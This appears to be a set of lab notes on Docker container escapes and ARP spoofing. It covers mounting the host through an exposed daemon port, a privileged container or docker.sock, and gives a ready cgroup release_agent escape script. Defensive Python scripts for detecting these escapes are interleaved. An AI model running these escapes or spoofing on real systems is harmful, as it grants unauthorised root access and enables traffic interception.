Exposed docker port

If the Docker daemon's TCP port is exposed remotely, any docker command can be run against the host's daemon, so any privilege escalation vector will work here.

I typically spin up a container with the --privileged flag, which then allows me to mount the host's file system as root from inside the container.

┌──(kali㉿kali)-[~/Documents/WithSecureLabs/dockerEscapes/lab1]
└─$ docker -H 192.168.22.130:2375 info
  Native Overlay Diff: true
  userxattr: false
 Logging Driver: json-file
 Cgroup Driver: cgroupfs
 Cgroup Version: 1
 Plugins:
  Volume: local
  Network: bridge host ipvlan macvlan null overlay
  Log: awslogs fluentd gcplogs gelf journald json-file local logentries splunk syslog
 Swarm: inactive
 Runtimes: io.containerd.runc.v2 io.containerd.runtime.v1.linux runc
 Default Runtime: runc
 Init Binary: docker-init 
 containerd version: d71fcd7d8303cbf684402823e425e9dd2e99285d
 runc version: b9ee9c6314599f1b4a7f497e1f1f856fe433d3b7
 init version: de40ad0
 Security Options:
  apparmor
  seccomp
   Profile: default
 Kernel Version: 4.19.0-17-amd64
 Operating System: Debian GNU/Linux 10 (buster)
 OSType: linux
 Architecture: x86_64
 CPUs: 1
 Total Memory: 899.6MiB
 Name: buster

docker -H 192.168.22.130:2374 run -it -v /:/host/ ubuntu:18.04 chroot /host/ bash

Once inside the container you can mount the host file system as shown below under Privileged container. If this doesn't work, try a different image, or one already present on the box: list them with docker image ls -a

Privileged container

In a privileged container you can simply mount the host's file system, usually on /dev/sda1, into a directory of your choosing:

mkdir -p /mnt/hola
mount /dev/sda1 /mnt/hola

Exploiting an exposed socket

# List images to use one
docker images
# Run the image mounting the host disk and chroot onto it
docker run -it -v /:/host/ ubuntu:18.04 chroot /host/ bash

Exposed docker.sock with curl / API

root@62f69d202b3a:/$ curl --unix-socket docker.sock http://localhost/v1.41/containers/13e1568e2363cc35874f47cb032653ae94eb91f469b3bcd8f7383aacbd1527a0/exec -d '{"AttachStderr": true,"AttachStdout": true,"Tty":true,"Cmd":["mkdir","-p","/mnt/hola"]}' -H "Content-Type: application/json"
{"Id":"c87daed87f046851f2b1a15dc813e6cb6086e0d3a9f3337299f8283a5b36ca02"}

root@62f69d202b3a:/$ curl --unix-socket docker.sock http://localhost/v1.41/exec/c87daed87f046851f2b1a15dc813e6cb6086e0d3a9f3337299f8283a5b36ca02/start -d '{"Tty":true}' -H "Content-Type: application/json"

root@62f69d202b3a:/$ curl --unix-socket docker.sock http://localhost/v1.41/containers/13e1568e2363cc35874f47cb032653ae94eb91f469b3bcd8f7383aacbd1527a0/exec -d '{"AttachStderr": true,"AttachStdout": true,"Tty":true,"Cmd":["mount","/dev/sda1","/mnt/hola"]}' -H "Content-Type: application/json"
{"Id":"ffd2b31260388f69af4b6df22c2b841400fbb51b14c1e04ce86742e2dd96317f"}

root@62f69d202b3a:/$ curl --unix-socket docker.sock http://localhost/v1.41/exec/ffd2b31260388f69af4b6df22c2b841400fbb51b14c1e04ce86742e2dd96317f/start -d '{"Tty":true}' -H "Content-Type: application/json"

root@62f69d202b3a:/$ curl --unix-socket docker.sock http://localhost/v1.41/containers/13e1568e2363cc35874f47cb032653ae94eb91f469b3bcd8f7383aacbd1527a0/exec -d '{"AttachStderr": true,"AttachStdout": true,"Tty":true,"Cmd":["cat","/mnt/hola/root/flag.txt"]}' -H "Content-Type: application/json"
{"Id":"13891b2e24ab49c5786f9cc4e96eaf99aea7012f4b40d95b8cf41549dcdd80cd"}

root@62f69d202b3a:/$ curl --unix-socket docker.sock http://localhost/v1.41/exec/13891b2e24ab49c5786f9cc4e96eaf99aea7012f4b40d95b8cf41549dcdd80cd/start -d '{"Tty":true}' -H "Content-Type: application/json"
w0ops13-i-exp0s3d-th3-un1x-s0ck3t
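As an added, defender-side example (not code from the original notes), the check below reads docker inspect output and flags the preconditions the sections above rely on: --privileged, the host root bind-mounted in (-v /:/host/), the daemon socket mounted inside a container, and CAP_SYS_ADMIN, which is what a container needs to mount a cgroup filesystem for the release_agent trick further down this page. The sample inspect records are constructed and the container names and IDs in them are hypothetical.

```python
import json
import sys

# One finding per escape precondition used on this page.
PRIVILEGED = "privileged"            # --privileged: mount the host disk from inside
HOST_ROOT_MOUNT = "host-root-mount"  # -v /:/host/: chroot straight onto the host
DOCKER_SOCK_MOUNT = "docker-sock"    # docker.sock inside: drive the daemon with curl
CAP_SYS_ADMIN = "cap-sys-admin"      # lets a container mount a cgroup fs (release_agent)

SOCK_PATHS = {"/var/run/docker.sock", "/run/docker.sock"}


def _bind_sources(rec):
    """Host-side source path of every bind mount, from HostConfig.Binds and Mounts."""
    sources = set()
    for bind in rec.get("HostConfig", {}).get("Binds") or []:
        sources.add(bind.split(":", 1)[0])
    for mount in rec.get("Mounts") or []:
        if mount.get("Type") == "bind":
            sources.add(mount.get("Source", ""))
    return sources


def audit_container(rec):
    """Return the list of findings for one `docker inspect` record."""
    host_config = rec.get("HostConfig", {})
    findings = []
    if host_config.get("Privileged"):
        findings.append(PRIVILEGED)
    caps = set()
    for cap in host_config.get("CapAdd") or []:
        cap = cap.upper()
        caps.add(cap[4:] if cap.startswith("CAP_") else cap)  # accept SYS_ADMIN or CAP_SYS_ADMIN
    if caps & {"SYS_ADMIN", "ALL"}:
        findings.append(CAP_SYS_ADMIN)
    sources = _bind_sources(rec)
    if "/" in sources:
        findings.append(HOST_ROOT_MOUNT)
    if sources & SOCK_PATHS:
        findings.append(DOCKER_SOCK_MOUNT)
    return findings


def audit_inspect(json_text):
    """Map container name -> findings for a `docker inspect` JSON document."""
    records = json.loads(json_text)
    if isinstance(records, dict):
        records = [records]
    return {rec.get("Name") or rec.get("Id", "?"): audit_container(rec) for rec in records}


# Constructed sample in the shape of `docker inspect` output; names and IDs are hypothetical.
SAMPLE_INSPECT = json.dumps([
    {"Id": "c0ffee000001", "Name": "/escape-lab",
     "HostConfig": {"Privileged": True, "Binds": ["/:/host/"], "CapAdd": None},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/host"}]},
    {"Id": "c0ffee000002", "Name": "/ci-runner",
     "HostConfig": {"Privileged": False,
                    "Binds": ["/var/run/docker.sock:/var/run/docker.sock"],
                    "CapAdd": ["SYS_ADMIN"]},
     "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
                 "Destination": "/var/run/docker.sock"}]},
    {"Id": "c0ffee000003", "Name": "/web",
     "HostConfig": {"Privileged": False, "Binds": None, "CapAdd": None},
     "Mounts": [{"Type": "volume", "Source": "/var/lib/docker/volumes/web/_data",
                 "Destination": "/data"}]},
])

if __name__ == "__main__":
    # On a host: docker inspect $(docker ps -q) | python3 audit_containers.py
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_INSPECT
    for name, findings in audit_inspect(text).items():
        print(f"{name}: {', '.join(findings) if findings else 'ok'}")
```

Pair this with a look at how the daemon itself is started: a -H tcp:// listener without --tlsverify is the exposed-port case at the top of the page, and no amount of per-container auditing helps once anyone on the network can call the API.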

Arp spoof

Ensure IP forwarding is on, so packets redirected to your machine are forwarded on rather than dropped (either command works):

echo 1 > /proc/sys/net/ipv4/ip_forward

sysctl -w net.ipv4.ip_forward=1

Forward requests from the client through you (replies tell CLIENT_IP that SERVER_IP is at your MAC):

arpspoof -i INTERFACE_NAME -t CLIENT_IP SERVER_IP

Forward requests from the server through you (replies tell SERVER_IP that CLIENT_IP is at your MAC):

arpspoof -i INTERFACE_NAME -t SERVER_IP CLIENT_IP

Dump the data you're intercepting:

tcpdump -A src CLIENT_IP

dsniff - tool for sniffing passwords; the dsniff package also ships other useful packet sniffing tools such as urlsnarf

urlsnarf

driftnet - picks out images from tcp streams
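The two arpspoof commands above leave a very recognisable trace on the wire: one MAC address suddenly answering for both CLIENT_IP and SERVER_IP, each of which had a different MAC a moment earlier. As an added example written from the monitoring side (not code from the original notes), the script below parses raw Ethernet/ARP frames and keeps an arpwatch-style table that alerts on exactly those two signs. The frames it runs against are constructed in memory and never sent; the MAC and IP addresses in them are hypothetical.

```python
import struct

ETHERTYPE_ARP = b"\x08\x06"
ARP_REPLY = 2


def make_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Constructed Ethernet II + ARP reply frame, used as in-memory test input only."""
    ethernet = target_mac + sender_mac + ETHERTYPE_ARP
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # Ethernet, IPv4, 6, 4, reply
    return ethernet + arp + sender_mac + sender_ip + target_mac + target_ip


def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip, target_mac, target_ip), or None if not ARP/IPv4."""
    if len(frame) < 42 or frame[12:14] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, opcode = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    body = frame[22:42]
    return opcode, body[0:6], body[6:10], body[10:16], body[16:20]


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw):
    return ".".join(str(b) for b in raw)


class ArpWatch:
    """Learns the first MAC that answers for each IP and alerts on (1) a later reply
    carrying a different MAC and (2) one MAC answering for several IPs, which is what
    the two arpspoof invocations above produce together."""

    def __init__(self):
        self.ip_to_mac = {}
        self.mac_to_ips = {}

    def observe(self, frame):
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            return []
        _, sender_mac, sender_ip, _, _ = parsed
        alerts = []
        known = self.ip_to_mac.setdefault(sender_ip, sender_mac)
        if known != sender_mac:
            alerts.append(f"{ip_str(sender_ip)} moved from {mac_str(known)} "
                          f"to {mac_str(sender_mac)} (possible ARP spoof)")
        claimed = self.mac_to_ips.setdefault(sender_mac, set())
        claimed.add(sender_ip)
        if len(claimed) > 1:
            alerts.append(f"{mac_str(sender_mac)} answers for {len(claimed)} IPs: "
                          + ", ".join(sorted(ip_str(ip) for ip in claimed)))
        return alerts


# Constructed lab addresses (hypothetical).
CLIENT_MAC, CLIENT_IP = bytes.fromhex("aabbcc000001"), bytes([10, 0, 0, 10])
SERVER_MAC, SERVER_IP = bytes.fromhex("aabbcc000002"), bytes([10, 0, 0, 20])
ROGUE_MAC = bytes.fromhex("aabbcc0000ff")


def demo():
    """Feed two genuine replies, then the two replies a bidirectional spoof sends."""
    watch = ArpWatch()
    frames = [
        make_arp_reply(SERVER_MAC, SERVER_IP, CLIENT_MAC, CLIENT_IP),  # server -> client, genuine
        make_arp_reply(CLIENT_MAC, CLIENT_IP, SERVER_MAC, SERVER_IP),  # client -> server, genuine
        make_arp_reply(ROGUE_MAC, SERVER_IP, CLIENT_MAC, CLIENT_IP),   # "-t CLIENT_IP SERVER_IP"
        make_arp_reply(ROGUE_MAC, CLIENT_IP, SERVER_MAC, SERVER_IP),   # "-t SERVER_IP CLIENT_IP"
    ]
    return [watch.observe(frame) for frame in frames]


if __name__ == "__main__":
    for i, alerts in enumerate(demo(), 1):
        print(f"frame {i}: {alerts or 'ok'}")
```

In a real deployment the frames would come from a raw socket or a capture library rather than make_arp_reply, and the second rule needs tuning: a router doing proxy ARP legitimately answers for many IPs, so whitelist known gateway MACs. On the switch side, Dynamic ARP Inspection or static ARP entries on the two hosts stop the redirection the page describes; tcpdump -n -i INTERFACE_NAME arp is the quick manual way to see the same flip-flop by eye.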

Privileged container

mount /dev/sda1 /mnt/<MNT POINT>

runc

root@gitlab:~# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

root@gitlab:~# echo 1 > /tmp/cgrp/x/notify_on_release

root@gitlab:~# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`

root@gitlab:~# echo "$host_path/cmd" > /tmp/cgrp/release_agent

root@gitlab:~# echo '#!/bin/sh' > /cmd

root@gitlab:~# echo "ps aux > $host_path/output" >> /cmd

root@gitlab:~# chmod a+x /cmd

root@gitlab:~# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

root@gitlab:~# cat /tmp/cgrp/release_agent

/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff/cmd

root@gitlab:~# head /output
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.1 167716  7728 ?        Ss   04:20   0:08 /sbin/init maybe-ubiquity
root           2  0.0  0.0      0     0 ?        S    04:20   0:00 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<   04:20   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<   04:20   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<   04:20   0:00 [kworker/0:0H-kblockd]
root           9  0.0  0.0      0     0 ?        I<   04:20   0:00 [mm_percpu_wq]
root          10  0.0  0.0      0     0 ?        S    04:20   0:01 [ksoftirqd/0]
root          11  0.0  0.0      0     0 ?        I    04:20   0:34 [rcu_sched]
root          12  0.0  0.0      0     0 ?        S    04:20   0:00 [migration/0]

root@gitlab:~# echo '#!/bin/sh' > /cmd

root@gitlab:~# echo "id > $host_path/output" >> /cmd

root@gitlab:~# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

root@gitlab:~# head /output

uid=0(root) gid=0(root) groups=0(root)

Summarised terminal output

That was quite a lot of text for an exploit; here it is in condensed form:

#!/bin/bash

# Mount the rdma cgroup v1 controller and create a child cgroup inside it
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

# Ask the kernel to run release_agent when the child cgroup becomes empty
echo 1 > /tmp/cgrp/x/notify_on_release
# Host-side path of this container's overlay upperdir, taken from /etc/mtab
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# release_agent runs on the host, so it needs the host-side path of /cmd
echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd
echo "<your_command_to_run_on_host> > $host_path/output" >> /cmd
chmod a+x /cmd

# Put a short-lived shell into the child cgroup; when it exits the cgroup empties and the agent fires
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

View command output:
cat /output
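The session above ends with release_agent holding /var/lib/docker/overlay2/<id>/diff/cmd, and that is the trace this technique leaves on the host: a cgroup v1 hierarchy whose release hook points into a container's writable layer. As an added host-side check (not part of the original notes), the scanner below walks the cgroup tree and reports every hierarchy with a non-empty release_agent, whether the agent lives inside a container layer, and which child cgroups have notify_on_release armed. The fixture it runs against is constructed and the layer id in it is hypothetical. Two caveats worth knowing: the docker info output at the top of the page shows Cgroup Version: 1, which this trick depends on (cgroup v2 has no release_agent), and step one needs to mount a cgroup filesystem, which a container without --privileged or CAP_SYS_ADMIN cannot do under Docker's defaults.

```python
import os
import re
import sys
import tempfile

# Host-side path of a container's writable overlay2 layer, the form the
# release_agent value takes at the end of the session above.
OVERLAY_DIFF = re.compile(r"^/var/lib/docker/overlay2/[0-9a-f]+/diff/")


def read_text(path):
    """Read a small cgroup control file; None if it cannot be read."""
    try:
        with open(path) as fh:
            return fh.read().strip()
    except OSError:
        return None


def scan_cgroup_root(root="/sys/fs/cgroup"):
    """Walk every cgroup v1 hierarchy under `root`.

    A hierarchy's release_agent is executed by the kernel, as host root, whenever
    a child cgroup with notify_on_release=1 empties. A non-empty agent is unusual
    on a Docker host, and one pointing into a container's overlay diff directory
    can only have been written from inside that container."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        if "release_agent" not in filenames:
            continue
        agent = read_text(os.path.join(dirpath, "release_agent"))
        if not agent:
            continue
        armed = sorted(
            d for d in dirnames
            if read_text(os.path.join(dirpath, d, "notify_on_release")) == "1"
        )
        findings.append({
            "hierarchy": dirpath,
            "release_agent": agent,
            "in_container_layer": bool(OVERLAY_DIFF.match(agent)),
            "armed_children": armed,
        })
    return findings


def build_fixture(base):
    """Constructed replica of the page's end state (hypothetical layer id): an rdma
    hierarchy whose release_agent points into an overlay2 diff dir and whose child
    cgroup 'x' has notify_on_release set, next to a clean memory hierarchy."""
    rdma = os.path.join(base, "rdma")
    os.makedirs(os.path.join(rdma, "x"))
    with open(os.path.join(rdma, "release_agent"), "w") as fh:
        fh.write("/var/lib/docker/overlay2/" + "ab" * 32 + "/diff/cmd\n")
    with open(os.path.join(rdma, "x", "notify_on_release"), "w") as fh:
        fh.write("1\n")
    memory = os.path.join(base, "memory")
    os.makedirs(os.path.join(memory, "docker"))
    open(os.path.join(memory, "release_agent"), "w").close()  # empty: the normal state
    return base


def demo():
    """Run the scanner over the constructed fixture and return its findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_cgroup_root(build_fixture(tmp))


if __name__ == "__main__":
    # With no argument this runs against the fixture; pass /sys/fs/cgroup (as root) on a real host.
    findings = scan_cgroup_root(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for finding in findings:
        print(finding)
```

Because the agent path is resolved on the host, the same scan also covers an attacker who is not running inside Docker: any non-empty release_agent that is not one your own tooling set is worth a look.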